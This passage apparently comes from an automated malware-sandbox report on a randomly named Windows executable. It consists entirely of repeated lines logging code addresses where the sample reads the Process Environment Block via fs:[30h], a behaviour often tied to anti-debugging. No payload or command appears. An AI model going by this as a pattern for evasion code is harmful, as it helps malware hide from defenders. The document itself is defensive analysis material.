                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01572000 mov eax, dword ptr fs:[00000030h]8_2_01572000
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE016 mov eax, dword ptr fs:[00000030h]8_2_014EE016
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01566030 mov eax, dword ptr fs:[00000030h]8_2_01566030
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA020 mov eax, dword ptr fs:[00000030h]8_2_014CA020
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC020 mov eax, dword ptr fs:[00000030h]8_2_014CC020
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015520DE mov eax, dword ptr fs:[00000030h]8_2_015520DE
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015120F0 mov ecx, dword ptr fs:[00000030h]8_2_015120F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D80E9 mov eax, dword ptr fs:[00000030h]8_2_014D80E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA0E3 mov ecx, dword ptr fs:[00000030h]8_2_014CA0E3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015560E0 mov eax, dword ptr fs:[00000030h]8_2_015560E0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC0F0 mov eax, dword ptr fs:[00000030h]8_2_014CC0F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D208A mov eax, dword ptr fs:[00000030h]8_2_014D208A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015960B8 mov eax, dword ptr fs:[00000030h]8_2_015960B8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015960B8 mov ecx, dword ptr fs:[00000030h]8_2_015960B8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C80A0 mov eax, dword ptr fs:[00000030h]8_2_014C80A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015680A8 mov eax, dword ptr fs:[00000030h]8_2_015680A8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01578350 mov ecx, dword ptr fs:[00000030h]8_2_01578350
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155035C mov eax, dword ptr fs:[00000030h]8_2_0155035C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155035C mov ecx, dword ptr fs:[00000030h]8_2_0155035C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159A352 mov eax, dword ptr fs:[00000030h]8_2_0159A352
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A634F mov eax, dword ptr fs:[00000030h]8_2_015A634F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01552349 mov eax, dword ptr fs:[00000030h]8_2_01552349
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157437C mov eax, dword ptr fs:[00000030h]8_2_0157437C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A30B mov eax, dword ptr fs:[00000030h]8_2_0150A30B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC310 mov ecx, dword ptr fs:[00000030h]8_2_014CC310
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F0310 mov ecx, dword ptr fs:[00000030h]8_2_014F0310
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A8324 mov eax, dword ptr fs:[00000030h]8_2_015A8324
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A8324 mov ecx, dword ptr fs:[00000030h]8_2_015A8324
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015743D4 mov eax, dword ptr fs:[00000030h]8_2_015743D4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015743D4 mov eax, dword ptr fs:[00000030h]8_2_015743D4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E3DB mov eax, dword ptr fs:[00000030h]8_2_0157E3DB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E3DB mov eax, dword ptr fs:[00000030h]8_2_0157E3DB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E3DB mov ecx, dword ptr fs:[00000030h]8_2_0157E3DB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E3DB mov eax, dword ptr fs:[00000030h]8_2_0157E3DB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA3C0 mov eax, dword ptr fs:[00000030h]8_2_014DA3C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D83C0 mov eax, dword ptr fs:[00000030h]8_2_014D83C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D83C0 mov eax, dword ptr fs:[00000030h]8_2_014D83C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D83C0 mov eax, dword ptr fs:[00000030h]8_2_014D83C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D83C0 mov eax, dword ptr fs:[00000030h]8_2_014D83C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158C3CD mov eax, dword ptr fs:[00000030h]8_2_0158C3CD
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015063FF mov eax, dword ptr fs:[00000030h]8_2_015063FF
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE3F0 mov eax, dword ptr fs:[00000030h]8_2_014EE3F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE3F0 mov eax, dword ptr fs:[00000030h]8_2_014EE3F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE3F0 mov eax, dword ptr fs:[00000030h]8_2_014EE3F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F438F mov eax, dword ptr fs:[00000030h]8_2_014F438F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F438F mov eax, dword ptr fs:[00000030h]8_2_014F438F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE388 mov eax, dword ptr fs:[00000030h]8_2_014CE388
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE388 mov eax, dword ptr fs:[00000030h]8_2_014CE388
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE388 mov eax, dword ptr fs:[00000030h]8_2_014CE388
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C8397 mov eax, dword ptr fs:[00000030h]8_2_014C8397
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C8397 mov eax, dword ptr fs:[00000030h]8_2_014C8397
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C8397 mov eax, dword ptr fs:[00000030h]8_2_014C8397
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A625D mov eax, dword ptr fs:[00000030h]8_2_015A625D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158A250 mov eax, dword ptr fs:[00000030h]8_2_0158A250
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158A250 mov eax, dword ptr fs:[00000030h]8_2_0158A250
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6259 mov eax, dword ptr fs:[00000030h]8_2_014D6259
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01558243 mov eax, dword ptr fs:[00000030h]8_2_01558243
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01558243 mov ecx, dword ptr fs:[00000030h]8_2_01558243
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA250 mov eax, dword ptr fs:[00000030h]8_2_014CA250
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C826B mov eax, dword ptr fs:[00000030h]8_2_014C826B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4260 mov eax, dword ptr fs:[00000030h]8_2_014D4260
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4260 mov eax, dword ptr fs:[00000030h]8_2_014D4260
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4260 mov eax, dword ptr fs:[00000030h]8_2_014D4260
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C823B mov eax, dword ptr fs:[00000030h]8_2_014C823B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A62D6 mov eax, dword ptr fs:[00000030h]8_2_015A62D6
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02E1 mov eax, dword ptr fs:[00000030h]8_2_014E02E1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02E1 mov eax, dword ptr fs:[00000030h]8_2_014E02E1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02E1 mov eax, dword ptr fs:[00000030h]8_2_014E02E1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E284 mov eax, dword ptr fs:[00000030h]8_2_0150E284
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E284 mov eax, dword ptr fs:[00000030h]8_2_0150E284
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01550283 mov eax, dword ptr fs:[00000030h]8_2_01550283
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01550283 mov eax, dword ptr fs:[00000030h]8_2_01550283
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01550283 mov eax, dword ptr fs:[00000030h]8_2_01550283
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02A0 mov eax, dword ptr fs:[00000030h]8_2_014E02A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02A0 mov eax, dword ptr fs:[00000030h]8_2_014E02A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov ecx, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D8550 mov eax, dword ptr fs:[00000030h]8_2_014D8550
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D8550 mov eax, dword ptr fs:[00000030h]8_2_014D8550
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150656A mov eax, dword ptr fs:[00000030h]8_2_0150656A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150656A mov eax, dword ptr fs:[00000030h]8_2_0150656A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150656A mov eax, dword ptr fs:[00000030h]8_2_0150656A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01566500 mov eax, dword ptr fs:[00000030h]8_2_01566500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A5D0 mov eax, dword ptr fs:[00000030h]8_2_0150A5D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A5D0 mov eax, dword ptr fs:[00000030h]8_2_0150A5D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D65D0 mov eax, dword ptr fs:[00000030h]8_2_014D65D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E5CF mov eax, dword ptr fs:[00000030h]8_2_0150E5CF
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E5CF mov eax, dword ptr fs:[00000030h]8_2_0150E5CF
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D25E0 mov eax, dword ptr fs:[00000030h]8_2_014D25E0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C5ED mov eax, dword ptr fs:[00000030h]8_2_0150C5ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C5ED mov eax, dword ptr fs:[00000030h]8_2_0150C5ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E59C mov eax, dword ptr fs:[00000030h]8_2_0150E59C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D2582 mov eax, dword ptr fs:[00000030h]8_2_014D2582
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D2582 mov ecx, dword ptr fs:[00000030h]8_2_014D2582
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01504588 mov eax, dword ptr fs:[00000030h]8_2_01504588
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015505A7 mov eax, dword ptr fs:[00000030h]8_2_015505A7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015505A7 mov eax, dword ptr fs:[00000030h]8_2_015505A7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015505A7 mov eax, dword ptr fs:[00000030h]8_2_015505A7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F45B1 mov eax, dword ptr fs:[00000030h]8_2_014F45B1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F45B1 mov eax, dword ptr fs:[00000030h]8_2_014F45B1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158A456 mov eax, dword ptr fs:[00000030h]8_2_0158A456
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C645D mov eax, dword ptr fs:[00000030h]8_2_014C645D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F245A mov eax, dword ptr fs:[00000030h]8_2_014F245A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155C460 mov ecx, dword ptr fs:[00000030h]8_2_0155C460
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FA470 mov eax, dword ptr fs:[00000030h]8_2_014FA470
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FA470 mov eax, dword ptr fs:[00000030h]8_2_014FA470
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FA470 mov eax, dword ptr fs:[00000030h]8_2_014FA470
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01508402 mov eax, dword ptr fs:[00000030h]8_2_01508402
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01508402 mov eax, dword ptr fs:[00000030h]8_2_01508402
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01508402 mov eax, dword ptr fs:[00000030h]8_2_01508402
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A430 mov eax, dword ptr fs:[00000030h]8_2_0150A430
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC427 mov eax, dword ptr fs:[00000030h]8_2_014CC427
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE420 mov eax, dword ptr fs:[00000030h]8_2_014CE420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE420 mov eax, dword ptr fs:[00000030h]8_2_014CE420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE420 mov eax, dword ptr fs:[00000030h]8_2_014CE420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D04E5 mov ecx, dword ptr fs:[00000030h]8_2_014D04E5
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158A49A mov eax, dword ptr fs:[00000030h]8_2_0158A49A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015044B0 mov ecx, dword ptr fs:[00000030h]8_2_015044B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155A4B0 mov eax, dword ptr fs:[00000030h]8_2_0155A4B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D64AB mov eax, dword ptr fs:[00000030h]8_2_014D64AB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01554755 mov eax, dword ptr fs:[00000030h]8_2_01554755
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512750 mov eax, dword ptr fs:[00000030h]8_2_01512750
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512750 mov eax, dword ptr fs:[00000030h]8_2_01512750
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155E75D mov eax, dword ptr fs:[00000030h]8_2_0155E75D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150674D mov esi, dword ptr fs:[00000030h]8_2_0150674D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150674D mov eax, dword ptr fs:[00000030h]8_2_0150674D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150674D mov eax, dword ptr fs:[00000030h]8_2_0150674D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0750 mov eax, dword ptr fs:[00000030h]8_2_014D0750
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D8770 mov eax, dword ptr fs:[00000030h]8_2_014D8770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
